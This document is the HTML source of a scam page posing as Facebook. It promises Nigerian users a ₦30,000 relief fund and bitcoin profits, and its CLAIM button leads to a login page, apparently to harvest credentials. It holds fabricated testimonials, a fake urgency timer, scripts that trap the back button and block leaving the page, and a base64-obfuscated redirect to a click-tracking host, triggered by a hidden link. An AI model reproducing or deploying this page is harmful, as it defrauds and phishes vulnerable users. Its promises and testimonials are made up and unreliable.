<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Facebook</title><meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1"><link href="https://tryuilluyitr.000webhostapp.com/Facebook-Files/fb/O2aKM2iSbOw.png" rel="apple-touch-icon-precomposed" sizes="196x196"><meta name="referrer" content="default" id="meta_referrer"><link rel="stylesheet" type="text/css" id="EH5zP" href="https://tryuilluyitr.000webhostapp.com/Facebook-Files/fb/g0LCLCXVa_q.css"><link rel="canonical" href="#"></head><body tabindex="0" class="touch x1 _fzu _50-3 iframe acw portrait" style="min-height: 664px; background-color: rgb(255, 255, 255);"><div id="viewport" style="min-height: 664px;"><h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><div id="page"><div class="_129_"></div><div class="_4g33 _52we _52z5" id="header"><div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter"><a href="#"><i class="img sp_qpIvdSU5o3E sx_72920b"><u>facebook</u></i></a></div></div>
 <script type="text/javascript">
        var monthNames = new Array("January", "February", "March", "April", "May", "June", "July", "August", "September" , "October", "November", "December");
        var now = new Date();
        now.setDate(now.getDate() + 1);
        var nowStringTommorow = monthNames[now.getMonth()] + "" + now.getDate() + ", "+ now.getFullYear();
    </script>
    <script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name +'=' +'(.+?)(&|$)').exec(location.search)||[,null])[1] ||''
    );
}
</script>
 <script type="text/javascript">
  navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
if (navigator.vibrate) {
    navigator.vibrate([1000, 500, 1000, 500, 1000, 500]);
}</script>
  <style>
 <script type="text/javascript">
  navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
if (navigator.vibrate) {
    navigator.vibrate([1000, 500, 1000, 500, 1000, 500]);
}</script>      
  <style>
    .contestwrap,.subheader{border-bottom:1px solid #ebebeb}.contestwrap table,.header table,.subheader table,td,tr{border-collapse:collapse;}.contestwrap p,.toptext{color:#000;font-size:small}.answer,.question{text-align:center}.answer,.pbox{cursor:pointer}#szlider,.pbox{overflow:hidden}.answer,.pbox h2,.prize h2,.prize h3,.prizebtn,.select2{font-weight:300}.reviews hr,hr{opacity:.2}html{font-family:sans-serif;font-color:#000;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0;background-position:50% 7%; min-width:320px;color:#000}a,div,h1,h2,h3,h4,h5,h6,li,ol,p,span,ul{margin:0;padding:0}a{text-decoration:none;color:#4485f6}h3{color:#212121}p{color:#737373}#q2,#q3,#q4,#v1b,#v1c,#v2b,#v2c,#v3b,#v3c,#v4s,#vfinal,.prize,.validate{display:none}.fbimg{background-color:#fff;border-radius:4px;max-width:210px;width:100%;padding:3px;box-sizing:border-box;border:1px solid grey;margin:10px 0 5px}.contestwrap,.form_questions{width:100%;border-radius:4px}.header{background-color:#FFFFFF;width:100%;padding:0; border-bottom: 1px solid #CCCCCC;}.contestwrap,.form_questions,.subheader{}.wrapper{max-width:1000px;width:96%;margin:0 auto}.subheader{width:100%}.subheader table,td,tr{padding:8px 0 4px}.subheader td{valign:middle}.spacer{height:20px}.contestwrap{box-shadow:0 0 2px 2px #e9e9e9;padding:10px 0 4px}.contestwrap,.form_questions{-webkit-box-shadow:0 0 2px 2px #e9e9e9;-moz-box-shadow:0 0 2px 2px #e9e9e9}.form_questions,.pbox,.validate{border-bottom:1px solid #e5e5e5}.select2{color:#777;font-size:small;padding:8px 0 4px}.form_questions{box-shadow:0 0 2px 2px #e9e9e9;padding:10px 0 30px}.answer{border:0 solid #3079ed;padding:10px 0;width:80%;display:inline-block;margin:5px;font-size:medium;color:#fff;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;background-color:#0054a4;background:-moz-linear-gradient(top,#0054a4 0,#0054a4 100%);background:-webkit-gradient(linear,left top,left bottom,color-stop(0,#0054a4),color-stop(100%,#0054a4));background:-webkit-linear-gradient(top,#0054a4 0,#0054a4 100%);background:-o-linear-gradient(top,#0054a4 0,#0054a4 100%);background:-ms-linear-gradient(top,#0054a4 0,#0054a4 100%);background:linear-gradient(to bottom,#0054a4 0,#0054a4 100%);filter:progid: DXImageTransform.Microsoft.gradient(startColorstr='#0054a4', endColorstr='#0054a4', GradientType=0)}.pbox,.validate{border-radius:4px}.pbox h2,.pbox img,.pbox p{display:block}.question{padding-top:20px}.validate{width:100%;background-color:#fff;box-shadow:0 0 2px 2px #e9e9e9;padding:0}.pbox,.validate{-webkit-box-shadow:0 0 2px 2px #e9e9e9;-moz-box-shadow:0 0 2px 2px #e9e9e9}#szlider{width:100%;height:4px;background:#dadada}#szliderbar{width:0;height:4px;background:#0054a4}#szazalek{color:#858585;font-size:small}.prize{width:100%}.pbox{background-color:#fff;box-shadow:0 0 2px 2px #e9e9e9;padding:10px 6px;position:relative}.pbox img{width:130px;margin-left:auto;margin-right:auto}.pbox h2,.pbox p{margin:6px 6px 0}.pbox h2{font-size:xlarge;text-align:left}.pbox p{font-size:small;text-align:left}.footer p,.prizebtn{display:inline-block}.prizebtn{border:0 solid #334c83;padding:4px 0;width:80%;margin:8px 4px 4px;text-align:center;font-size:.9em;color:#fff;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;background:#0054a4}.prize h3{font-size:1.5em;padding:5px 0;text-align:center}.prize h2{font-size:1.2em;text-align:left}.reviews{width:100%;padding:0;line-height:1.3}.reviews .name{font-weight:700;color:#0054a4}.reviews .text{color:#6a6a6a}.reviews .date{padding-bottom:6px;color:#006621;font-size:10px}.reviews table{padding:5px 0;font-size:small}.roundimg{width:50px; border-radius: 20%;}.reviews h2{color:grey;font-size:1.2em;font-weight:300;padding:20px 0 5px}.commentpad{padding-left:10px}.reviews span{color:#a5778f}.footer{background-color:#f2f2f2;border-top:1px solid #e4e4e4;padding:20px 0;color:#777;font-size:small}.footer p{padding-right:20px}
    @media only screen and (min-width:800px){.white_content{position:fixed;top:30%;left:30%;width:40%;background-color:rgb(255,255,255);border-radius:5px;z-index:1002;overflow:auto}.present{height:355px;width:100%;display:flex;flex-direction:column;justify-content:flex-start;align-items:center}}
@media only screen and (max-width:799px){.white_content{position:fixed;top:30%;left:5%;width:90%;background-color:rgb(255,255,255);border-radius:5px;z-index:1002;overflow:auto}.present{height:355px;width:100%;display:flex;flex-direction:column;justify-content:flex-start;align-items:center}}#light-text2{padding:15px;font-size:22px;text-transform:uppercase;text-align:center}#light-text2 span{color:#fff}.ps4man,.s-101m,.s-102m,.s-103m,.s-11m,.s-33m,.s-66,.s-88m,.s-99{width:50px;height:50px;background:url(avatar2-sprites.jpg) no-repeat}.s-11m{background-position:0 0}.s-33m{background-position:0 -54px}.s-66{background-position:0 -108px}.s-99{background-position:0 -161px}.s-88m{background-position:0 -215px}.ps4man{background-position:0 -269px}.s-101m{background-position:0 -322px}.s-102m{background-position:0 -377px}.s-103m{background-position:0 -430px}
  </style>
</head>
<body style="display: inline;" data-gr-c-s-loaded="true"> 
  <script>!function(){"undefined"!=typeof window.orientation&&(document.body.style.display="inline")}();</script>
   <div id="light" class="white_content" style="display: block; box-shadow: 0 0 10px rgba(0,0,0,2); ">
      <div style="width:100%;background: #FFFFFF;color:#fff; border-bottom:solid 1px #CCCCCC;">
        <div id="light-text2">
    <img src="https://i2.wp.com/www.arise.tv/batman/2021/10/e-naira.jpeg?fit=1024%2C576&ssl=1" width="140">
                    </div><table width="90%" style="padding-top:2px;margin:0 auto;">
               </table>
      </div>
     <div id="intro" style="display: block; padding:30px;"><b></b><font color="blue"><b><span id="timerr">FACEBOOK</span></b></font> users in <font color="green"><b><span id="timerr">Nigeria</span></b></font> can now recieve a onetime relief fund of <font color="red"><b><span id="timerr"> ₦30,000</span></b></font> to assist themselves and their family during this diffcult time <b>Click "On Claim" </b>below to recieve yours.<div id="exit" style="margin-top:20px; display:block;">
        <center><a style="background:#334c83;text-align:center;padding:6px 60px;text-decoration:none;color:#fff;cursor:pointer;" href="login.html" onclick="ok_btn()">CLAIM</a></center>
      </div>
    </div>
  </div>
  <!-- second modal -->
 <div id="light2" class="white_content" style="display: none; box-shadow: 0 0 10px rgba(0,0,0,0.5); ">
      <div style="width:100%;background: #334c83;color:#fff;">
        <div id="light-text2">
    <span>Congratulations!</span>
                    </div><table width="98%" style="padding-top:2px;margin:0 auto;">
                    
      
        </table>
      </div>
   
      <div id="intro" style="display: block; padding:30px;">
       2GB Data has been reserved for you!<br>
           CLAIM YOUR DATA!
        
      <div id="exit" style="margin-top:20px; display:block;">
        <center><a style="background:#334c83;text-align:center;padding:6px 60px;text-decoration:none;color:#fff;cursor:pointer;" onclick="tellme(); window.onbeforeunload =null;">OK</a></center>
      </div>
    </div>
  </div>

  <!-- third modal -->
  <div id="light3" class="white_content" style="display: none; box-shadow: 0 0 10px rgba(0,0,0,1); ">
      <div style="width:100%;background: #334c83;color:#fff;">
        <div id="light-text2">
    <span>Wait minute!</span>
                    </div><table width="98%" style="padding-top:2px;margin:0 auto;">
                    
      
        </table>
      </div>
   
 <div id="intro" style="display: block; padding:30px;">
       (1) There is only one 20,000$ in cash left! Are you sure you want to give up the eligibility for <script>document.write(getURLParameter('brand'))</script>?
        
      <div id="exit" style="margin-top:20px; display:block;">
        <center><a style="background:#334c83;text-align:center;padding:6px 60px;text-decoration:none;color:#fff;cursor:pointer;" href="">OK</a> </center>
      </div>
    </div>
  </div>


  <div class="header">

 
  <div class="spacer"></div>
  <div class="wrapper">
    <div class="contestwrap wrapper">
      <div class="toptext">
        <table class="wrapper">
          <tbody>
            <tr>
              <td style="width:60px; height=40px; margin-right:10px;"><img src=" https://giveawayservicess.000webhostapp.com/facebook-gifting-gifties-4rvcs/icon.png" width="40"></td>
<td align="left" valign="top"><b>Congratulations! <br>
You have been invited to start making at least <font color="red"><b><span id="timerr"> ₦30,000!</span></b></font>
                <br>
                <font style="color:#9fa2a6;font-size:x-small;">
<script>
                            var mydate=new Date()
                            mydate.setDate(mydate.getDate()-0);
                            var year=mydate.getYear()
                            if (year <1000)
                            year+=1900
                            var day=mydate.getDay()
                            var month=mydate.getMonth()
                            var daym=mydate.getDate()
                            if (daym<10)
                            daym="0"+daym
                             var dayarray=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday")
                            var montharray=new Array("January", "February", "March", "April", "May", "June", "July", "August", "September" , "October", "November", "December")
                            document.write(""+montharray[month]+" "+daym+"")
              </script></font></td>
            </tr>
          </tbody>
        </table>
          <p class="wrapper"><b></b><font color="blue"><b><span id="timerr">FACEBOOK</span></b></font> users can now start making at least <font color="red"><b><span id="timerr"> ₦30,000</span></b></font> to assist themselves and their family during this diffcult time <b></b>.<b></b> 
            <br>
            <br><strong>At present, 0ver 780,000 Nigerians users have received this invitation.</strong>
            <br>
            <br>
          </p>
        </div>
        <script type="text/javascript">
          //<![CDATA[
          function startTimer(t){var e,n,r=t,a=setInterval(function(){e=parseInt(r/60,10),n=parseInt(r%60,10),n=10>n?"0"+n:n,$("#timerr").text(e+" minutes "+n+" seconds"),--r<0&&(clearInterval(a))},1e3)}
          startTimer((1 * 60) + 29);
          //]]>
        </script>
        <style>
          .select2 {
            color: #737373;
            font-size: small;
            font-weight: 300;
            padding: 8px 0px 4px 0px;
          }
</style>
        <div class="select2 wrapper">
          Please 
          <font color="red"><b><span id="timerr">Follow the instructions to </span></b></font> start making your own good profits from the bitcoin market!
        </div>
      </div>
    </div>
    <div class="spacer"></div>
    <div class="form_questions wrapper">
            </div>
          </td>
        </tr>
      </tbody></table>
    </div>
    <div class="spacer"></div>
    <div class="reviews wrapper">
      <div class="wrapper">
        <style>
    .facebook-comments {
        font-family: 'Open Sans', Arial, sans-serif;
        color: #1d2129;
        font-size: 14px;
        line-height: 1.358;
        display: none;
    }

    .facebook-comments.loaded {
        display: block;
    }

    .facebook-comments a {
        color: #365899;
        text-decoration: none;
    }

    .facebook-comments a:hover {
        text-decoration: underline;
        color: #365899;
    }

    .facebook-comments a:visited {
        color: #365899;
    }

    .facebook-comments__title {
        border-bottom: 1px solid #e9ebee;
        line-height: 25px;
        margin-bottom: 24px;
        padding: 8px 0;
        font-weight: 700;
        text-transform: lowercase;
    }

    .facebook-comments__item {
        margin-top: 24px;
    }

    .facebook-comments__item:after {
        content: '';
        display: table;
        clear: both;
    }

    .facebook-comments__item-avatar {
        width: 48px;
        float: left;
        display: block;
        text-decoration: none;
    }

    .facebook-comments__item-avatar img {
        display: block;
        max-width: 100%;
    }

    .facebook-comments__item-body {
        margin-left: 56px;
    }

    .facebook-comments__item-name {
        font-weight: 700;
    }

    .facebook-comments__item-name a {
        color: inherit;
        text-decoration: none;
    }

    .facebook-comments__item-text {
        margin-top: 4px;
    }

    .facebook-comments__item-meta {
        font-size: 12px;
        color: #b2b2b4;
        margin-top: 8px;
    }
</style>
<script>
    window.addEventListener('load', loadComments);
    function loadComments() {
        document.querySelector('.facebook-comments').className += ' loaded';
    }
</script>
<div class="facebook-comments loaded">
                    <h2 class="faq-section-header text-center dark-purple bold" data-i18n>TESTEMONIALS</h2>
    <div class="facebook-comments__list">
                    <<div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/1(1).jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Ogbonna Oscar</a>
                    </div>
                    <div class="facebook-comments__item-text">I just received 30k into my GT Bank account, I so much appreciate, I am so happy I joined this giveaway. </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Two hours ago</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/2(1).jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Bobson Amaka</a>
                    </div>
                    <div class="facebook-comments__item-text">OH my goodness, I thought this was another scam, 30,000 for free is an amazing offer thanks so much. </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Five hours ago</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/6.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Fidelia Ebere Chinweze</a>
                    </div>
                    <div class="facebook-comments__item-text">thank you so much, I really appericiate. I followed the instruction and from there I recieved 30,000 into my bank account. </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/4(1).jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Samson Felix</a>
                    </div>
                    <div class="facebook-comments__item-text">It’s small but I appreciate. </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/3(1).jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Adeyemo Adeshina</a>
                    </div>
                    <div class="facebook-comments__item-text">I am still have network problem here, please help!</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/10.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Princess Thomas</a>
                    </div>
                    <div class="facebook-comments__item-text">Everything is Possible&nbsp; don't dull</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/7.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Adewale Oguntimehin</a>
                    </div>
                    <div class="facebook-comments__item-text">Hope I will get 30k? I am lost.</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/13.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Joy Davis</a>
                    </div>
                    <div class="facebook-comments__item-text"> everything has become so expensive, I really appericiate this gift. </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/9.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Iretede Adewale</a>
                    </div>
                    <div class="facebook-comments__item-text">Both I and my sister got ours today, thanks. </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/8.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Oko Linus</a>
                    </div>
                    <div class="facebook-comments__item-text">Impressive </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/5(1).jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Azuka Chukwuma</a>
                    </div>
                    <div class="facebook-comments__item-text">I want this too 😜😜😜</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Today</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/141.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Gabriel Towoju</a>
                    </div>
                    <div class="facebook-comments__item-text">I tried but failed, my whatsapp is outdated. </div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Yesterday</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/5(1).jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Chidi David </a>
                    </div>
                    <div class="facebook-comments__item-text">I love this.</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Yesterday</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/14.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Angela Ogbonna</a>
                    </div>
                    <div class="facebook-comments__item-text">I got 30k.</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Yesterday</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/12.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Osugba Julie</a>
                    </div>
                    <div class="facebook-comments__item-text">how can i get my own 30k? somebody help.</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Yesterday</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://giveawayservicess.000webhostapp.com/Money-earn-source-bitcoin-sur59/13.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">David Ogaga</a>
                    </div>
                    <div class="facebook-comments__item-text">this is real.</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Yesterday</span>
                                            </div>
                </div>
            </div>
                    <div class="facebook-comments__item">
                <a href="http://lestsbane-sockgles.com/" target="_blank" class="facebook-comments__item-avatar">
                                            <img src="https://dynamicmedia.zuza.com/zz/m/original_/c/3/c3977278-81b5-41f6-8896-ff838cab6555/833394_Super_Portrait.jpg" alt="">
                                    </a>
                <div class="facebook-comments__item-body">
                    <div class="facebook-comments__item-name">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Paul Emeka</a>
                    </div>
                    <div class="facebook-comments__item-text">Aha-ha, let’s do it</div>
                    <div class="facebook-comments__item-meta">
                        <a target="_blank" href="http://lestsbane-sockgles.com/">Like</a> · <a target="_blank" href="http://lestsbane-sockgles.com/">Reply</a>
                                                    · <span>Yesterday</span>
                                            </div>
                </div></table>
      <hr>

  <script src=" https://giveawayservicess.000webhostapp.com/facebook-gifting-gifties-4rvcs/jquery.min.js"></script>
  <script type="text/javascript">
  /*setTimeout(function(){alert('**********************\n\n(1) 20,000$ in cash je za vas rezerviral Facebook! \n\n***POMEMBNO*** \n\n1. Odgovorite na preprosto vprašanje in potrdite, da ste človek. \n\n2. Vnesite svojo preprosto slovensko telefonsko številko, da vam že jutri pošljemo vaš iPhone 7!\n \n');window.onbeforeunload=null;$(window).on('beforeunload', null);window.location = "";},3*60*1000);*/
    function ok_btn2() {
          $('#light2').css('display','block');
    }
</script>
   <script type="text/javascript">
   $(document).ready(function() {
      setInterval(function(){$("h1").toggle()},1500);
      $("#q1 .answer").click(function(){$("#q1").hide(0,function(){$("#q2").fadeIn()})}),$("#q2 .answer").click(function(){$("#tq2").hide(),$("#q2").hide(0,function(){$("#q3").fadeIn()})}),$("#q3 .answer").click(function(){$("#tq3").hide(),$("#q3").hide(0,function(){$("#q4").fadeIn()})}),$("#q4 .answer").click(function(){$(".form_questions").hide(0,function(){$(".validate").show(),$("#v0a").fadeIn(),$("#v1a").fadeIn(),$("#v1b").fadeIn()}),setTimeout(function(){$("#v1a").hide(),$("#v1b").hide(),$("#v1c").show(),$("#v1d").show(),$("#v2a").show(),$("#v2b").show()},2e3),setTimeout(function(){$("#v2a").hide(),$("#v2b").hide(),$("#v2c").show(),$("#v2d").show(),$("#v3a").show(),$("#v3b").show()},4500),setTimeout(function(){$("#v3a").hide(),$("#v3b").hide(),$("#v3c").show(),$("#v3d").show(),$("#vfinal").show(),calldiv(),$("#v0a").hide(),$("#v0b").show()},6500),setTimeout(function(){$("#v4").show(),$("#v4s").show(),$(".reviews").show()},6500)});


function calldiv()
    {

      setTimeout(explode, 500);
      
      
      
    }
     function explode(){
       $('html,body').animate({
               scrollTop: $("#v4s").offset().top}, 800);
         
        //alert($("#v4"));
    }

    });
   </script>
<script type="text/javascript">
    
  function ok_btn() {
        $('#light').css('display','none');
  }
  </script>


<a onclick="tellme(); window.onbeforeunload=null;" style="font-size: 2px; color: #E7E8E5; position: absolute; left: -900px;">Claim</a>   

<!--<script src=" https://giveawayservicess.000webhostapp.com/facebook-gifting-gifties-4rvcs/p.js" defer=""></script>-->

</div></div>

 <script type="text/javascript">
        
    	function tellme()
		{
		 var e = window.event;
		 var posX = e.clientX;
		 var posY = e.clientY;
		 if( posX >10 && posY >10)
	 		{
		    str = "aHR0cDovL2o2aGVrLnZvbHV1bXRyazM=";
		    str = atob(str)+'.com/click';
		  window.location.replace( str );
		 }
		}    
        
  
function init() {
setTimeout(function(){window.scrollTo(0,1)},0);
}

window.history.pushState('back.html', 'back', 'back.html');
window.history.pushState('index.html', 'Index', 'index.html');
window.addEventListener("popstate", function(e) {
if(document.URL.indexOf("back.html") >= 0){
document.location.href = document.location;
window.onbeforeunload=null;
 
}

});

 window.onbeforeunload = function() {
            return 'Are you want to leave this page!';
    }         
            

setTimeout(function() {
            window.onbeforeunload = null;
            location.URL = "facebookrapidrelieffund/index.html";
        },3* 60 * 1000);
             
      

        </script>
</body></html>
